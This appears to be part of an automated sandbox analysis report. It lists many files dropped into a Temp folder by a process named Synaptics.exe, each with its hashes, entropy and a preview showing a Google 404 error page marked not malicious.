                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.265605279404806
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0pSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+2+pAZewRDK4mW
                                                                                                                    MD5:5E225EDC8865E60FE789E89CA277BD52
                                                                                                                    SHA1:987CB273716042BCB821CCEB3262207D2639EF13
                                                                                                                    SHA-256:6B3465F9EB739A7F9C50F6F8721E46245F01C9E637A9ED10A706703EBA3B2B16
                                                                                                                    SHA-512:9C971F6DC56715F1F76E8BB316E76A8E176BA61114AF4D5741B53E1365EB5130C6A46CB666F92947580ED729BAE9C1D253F467CFB83C6F4209E3549B71F66DFA
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="W9h4rSfOZGNS2dWfC9gJww">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\EW5zkjD.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.265680611044739
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0YDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+D+pAZewRDK4mW
                                                                                                                    MD5:FBCF20954F9B9FEC940DC8BA9433895D
                                                                                                                    SHA1:480F49B87F4AE50C205EA6F0C43D5063F08ECD57
                                                                                                                    SHA-256:D5E8C2BEF982EA67851682F45C689052F94B11BC149A36EB8692CDB059631446
                                                                                                                    SHA-512:F29B5DD8816DFE67A416FDE1C87D65C60E5C711865BAF6FABA2DFDB9471523E4E8C21BDD3D594E8F9E8B79D49747CE0B43177F5A97A971AE39ED377371BE80AF
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="cBRbYgQmSAdWqr9h1DY-Cw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\FFkSblS.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.255761562464222
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0BtSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK++t+pAZewRDK4mW
                                                                                                                    MD5:7C3C0B0F0F71B97A6C8C5DFCFCC61068
                                                                                                                    SHA1:4EA1113B95C0B26278A9CB0E1A321648AF23BC51
                                                                                                                    SHA-256:D133031CB07D81A411C76A341AB357B4858732B18C3871000657F51045804552
                                                                                                                    SHA-512:1BEFE318CDE5D8FEE6C8ED5F469DA6408A0FB12A7D30ECD93849EBC2196A0B32FA2C39FA1E8809073E1DF53B53727156798768CAC72AAFB08573F8898F6DE8D4
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="62Gue7v0cARzca-bLlVJ6w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\FNYde3T.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.262653351843568
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0FESU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+eE+pAZewRDK4mW
                                                                                                                    MD5:BF2AA6841F30090A7E966946A042B5D5
                                                                                                                    SHA1:3715FECC459E2871766B9D8D262D0877D1B96DD5
                                                                                                                    SHA-256:EBA97D9E919078255A5F9F132FA3D4E8EB84449536158563B2A0B99D4631F563
                                                                                                                    SHA-512:6328ABA9C5D9D781581780224F22631FBFD293BF69E0C2718AE48AB287772C78EADFB8F6549C683F9FC7B308C82C5BD0B5A32C317BE09A3054A2C2DE92188A5B
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="zPFkX-g4sjOwV1pC4VfWiw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\FeCj4oX.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.250031731574487
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0uDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+xD+pAZewRDK4mW
                                                                                                                    MD5:A401FDA8805AD8F6C3E9936A49A83577
                                                                                                                    SHA1:189CE0CE13D04B07A2E5A43658B72D0FB66F79F7
                                                                                                                    SHA-256:AAB2C68AEBD86AF0677B77D735111ECBAA9400226AEB547FD38610AC7C362633
                                                                                                                    SHA-512:795A4F529CD60AB9577D6353B9D93D639AC4782469771991D0094E59B77DF16034F0EE7D2A5183DB30F5972776DB5338107AD6A5F2AFF631965D6C6F088306A3
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="nAmHgmeW0LnsgMpYlKd3pA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\GJGTVv6.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.261028674849901
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0vSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+c+pAZewRDK4mW
                                                                                                                    MD5:F5454A187C714CB63DDCC0C5DB593ED2
                                                                                                                    SHA1:410BF3029544F8923EDC31DC07884D3C1A38D77C
                                                                                                                    SHA-256:7259F4A224698A1467408549ED200C948C0C9BAF86DD4F02AB7C97671E8E953A
                                                                                                                    SHA-512:93AE2C411C23A6369D814E8B0486F294094D99BCA475ABD8FEA1080B0C09344B43E268669381223F80C95B9184980B338740E00BD810BD713D4E072FE016C2C0
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="wAbAHBtmdHfkZZOg_-Up1Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\GSQrxDD.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.273382493770325
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0QyctSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+HT+pAZewRDK4mW
                                                                                                                    MD5:93BC70C1ED14F3EBF3CC31591DD9F6B0
                                                                                                                    SHA1:A359BF8BFBC569F7BCDE774C13F95998EC2ACBA8
                                                                                                                    SHA-256:CB689856AC92A0E2515DD7F63742C942158224A290C32C70FAF1B11BF4DC3436
                                                                                                                    SHA-512:D78434FBFAE7DAC1B696C6227D09F6E89F4F425DAFCAA6EA4F686456E267135CD8E6AE961452F422028E09C06F62CF10614C0250A8E779E2DD391A2D562E5BB0
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="oeGZ8DQHlIfHF_HKF8LTkQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\Ghsex5t.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.253159941975945
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+01HKJSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+SqJ+pAZewRDK4mW
                                                                                                                    MD5:3DF80A51DD8C4BCB5DAE622632A6D818
                                                                                                                    SHA1:72E2E726F93DE2F7D54E7D9A3331109E89F92230
                                                                                                                    SHA-256:8F4A61CFAD3FA336BB21C75534E53122C8B7886EF50037A92897A525E0AD93D2
                                                                                                                    SHA-512:7483274137C12ADAB8299450BABD3F3F990F631F5700CEE2090BA7C7D89F9A12383AD4BB5C070880E69771ACB62EC333E53BE70A153B0A09CA1024407E2D9C4F
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="lWhE3OnbogUJKjmhtgkm0A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\GwRVxyl.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.2535803832393935
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0wSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+z+pAZewRDK4mW
                                                                                                                    MD5:73E8D61A123D985F4A0647886C047928
                                                                                                                    SHA1:4BAEE8061EF6825A8C35EF0801D2B452C66199B7
                                                                                                                    SHA-256:6AA2C53B2C84673567834FE0F43DE0403233A23904FB2C0B7958AE211DED991E
                                                                                                                    SHA-512:2373FFAE59841DB34509B65B8208EC62A6CFCF9A06EFFAB1177202CDB9090D332460CA7FF526D7171CCB972FD31CE45604CA1E2654809E9F60FA246D356AB3C1
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="BOwNgwRcH53rsAAg2Kci2w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\HRQT2De.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.273347789255024
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0BngSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+sg+pAZewRDK4mW
                                                                                                                    MD5:0403879ABC18F0F2523B76A42C326A29
                                                                                                                    SHA1:C17C709F6314D99A2A879673FD2BC1592803C0D2
                                                                                                                    SHA-256:7C555D3091C207FBB9C4320ADD70A3B1CE0D041D49012AE1C16F20AC842175EA
                                                                                                                    SHA-512:81114F1DAE21B9315B7881431984DA9B77A353C2368F8759609753727121B2BEA9C3514AE210EE0FFD35774BC614703DB4D6B2C666A4669228E6A19F7037308B
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="CeFOYRiO5H3fJeJScjjrGQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\HUtFUH8.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.26475663829633
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0pSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+u+pAZewRDK4mW
                                                                                                                    MD5:CBDFD59D825EAB4E5972629D2657E4F6
                                                                                                                    SHA1:231C066A3A047F1B303E398308817A7ABA4A1280
                                                                                                                    SHA-256:0EAC914FE24BF422661C78E7860DC7FDB71C5F54A7FA23D98DA6D9509EA0E0CF
                                                                                                                    SHA-512:A57AF8B9E4C24BA8F8191EAB6A50596AF74548EBBBFA322EEDBCA651D49C67FB2B1BDECFB0C75EBC0DB7A8D2990AA9ABACE4BB01E651EC005F4C7296FBB5284E
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="hwbn3P0YQ6FtQQO5bbpZSQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\IjfufnJ.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.2551633949359084
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0sISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+hI+pAZewRDK4mW
                                                                                                                    MD5:CE3C4716056587A8C6FE3106756729C4
                                                                                                                    SHA1:6A4470F75F56A2E2CE45BEB4539266739543BF5B
                                                                                                                    SHA-256:87B5EDC3EFBEAC7D06BF106DBDF0F4C525B6768128282C07C00790E3FC7BE9B8
                                                                                                                    SHA-512:ED6E9FD3CF6992386DD977555558E0A07021C1AC48D3E1002566718724BAE906421153D9FE371FA980D0D9DBFDF3FB55EEDFC70C5B805C3C8276DFF7299CA970
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="UFMa_eBfbSjsPdScl15pTw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\JNOMvZv.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.255588331393292
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+01zSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Sz+pAZewRDK4mW
                                                                                                                    MD5:C074C4549D60541BE67C31162A165BC7
                                                                                                                    SHA1:7CCD54A757ECE656E3FEBFD7A30767A438990342
                                                                                                                    SHA-256:EE775E64FBB23B0F6437656C1724EE16B01434D791974DE114FD19261E634608
                                                                                                                    SHA-512:0DE3DEF12BB45989710B9C6EA51835B727B685427B40C61C94EC94A34F49FE3CA79FCEB90E7C0630375E64702D4B954213E571A88C229AC80F624697A0B73F91
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="3bAhpZbAxewhemjARX0ZQg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\JqwHhT8.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.26352265631552
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0t0zSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+U0z+pAZewRDK4mW
                                                                                                                    MD5:02A8FCE3FEEC70E62DA45767F3CFB6C9
                                                                                                                    SHA1:7A5564BE070CFD3C5ABF857DE748C700F444BBFA
                                                                                                                    SHA-256:7256FE238292BE4EF75DA79A60E3F15955A1C3C0A9469AFEAE3342782DB98FBC
                                                                                                                    SHA-512:B642D97B30E17AE4A3444CB89CB037272FFE50291315783379E6592F4C50659D5CA8E97E2B3C0AA22C18F8C04C57D974F93D3BC2F75A0783E9FDC4D9B0898F24
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="YrAw9zisJVW7TCIyycYflg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\LQFhb1v.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.261964419822244
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0uSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+1+pAZewRDK4mW
                                                                                                                    MD5:72D34A0D4DB3178CEC7D56DDF182A5A2
                                                                                                                    SHA1:00CE5BA460D5431FAEEDA9DF0F201EF41F910FF2
                                                                                                                    SHA-256:00D11CF9227B478D3403ED41E8C63267FE70B9E2737F1581808B3DEE5584F6E4
                                                                                                                    SHA-512:21B4EEADBB1D962CF32063596A6C79395173C579E875C84E886CD4124D5167EB5B3834A0C4160016D5576428A223705D20F79FC217B465C520251586BD169216
                                                                                                                    Malicious:false
